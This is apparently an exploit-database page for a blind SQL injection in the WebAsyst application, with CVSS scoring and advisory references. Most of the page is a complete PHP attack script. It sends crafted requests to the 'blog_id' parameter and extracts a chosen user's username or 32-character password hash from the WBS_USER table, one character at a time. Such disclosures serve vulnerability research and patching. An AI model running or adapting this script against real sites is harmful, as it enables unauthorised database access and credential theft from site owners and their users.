WebAsys blindSQL-inj exploit

2011-10-09 / 2011-10-10
Credit: zsh.shell
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /** * WebAsys blindSQL-inj exploit * @author: zsh.shell */ if($argc !== 4) { echo "#######################################\n\n"; echo "GET username by id:\tphp ".$argv[0]." url id u\n"; echo "GET password by id:\tphp ".$argv[0]." url id p\n"; echo "\nExample: php ".$argv[0]." http://site.com/ 1 p\n\n"; die("#######################################\n"); } $url = $argv[1]."index.php?ukey=news&blog_id="; $id = $argv[2]; $me = $argv[3]; if($me == 'u') { $me = "lower(U_ID)"; $chars = Array(0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z); for($i=1;$i<=25;$i++) { $vuln = $url."if((select+length(U_ID)+FROM+WBS_USER+where+C_ID=1)=".$i.",1,(select+1+union+select+2))"; $result = file_get_contents($vuln); if(!preg_match("/Subquery returns/", $result)) { $much = $i; break; } } } elseif($me == 'p') { $me = "U_PASSWORD"; $chars = Array(0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f); $much = 32; } else die("Wrong exploit parametr". $me ."\n"); $chars = array_map("ord", $chars); for($i=1;$i<=$much;$i++) foreach($chars as $j) { for($k=0;$k<=strlen($out);$k++) echo chr(8); $vuln = $url."if(ascii(substring((select+".$me."+from+WBS_USER+where+C_ID=".$id."),".$i.",1))=".$j.",1,(select+1+union+select+2))"; $result = file_get_contents($vuln); $out = "[".chr($j)."] :> ".$res; if(!preg_match("/Subquery returns/", $result)) { $res .= chr($j); break; } echo $out; } if(substr(strtolower(PHP_OS),0,3) == 'win') system("cls"); else system("clear"); echo "[+] Result:\t".$res."\n"; ?>

References:

http://www.securityfocus.com/bid/40349
http://packetstormsecurity.org/1005-exploits/webasyst-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top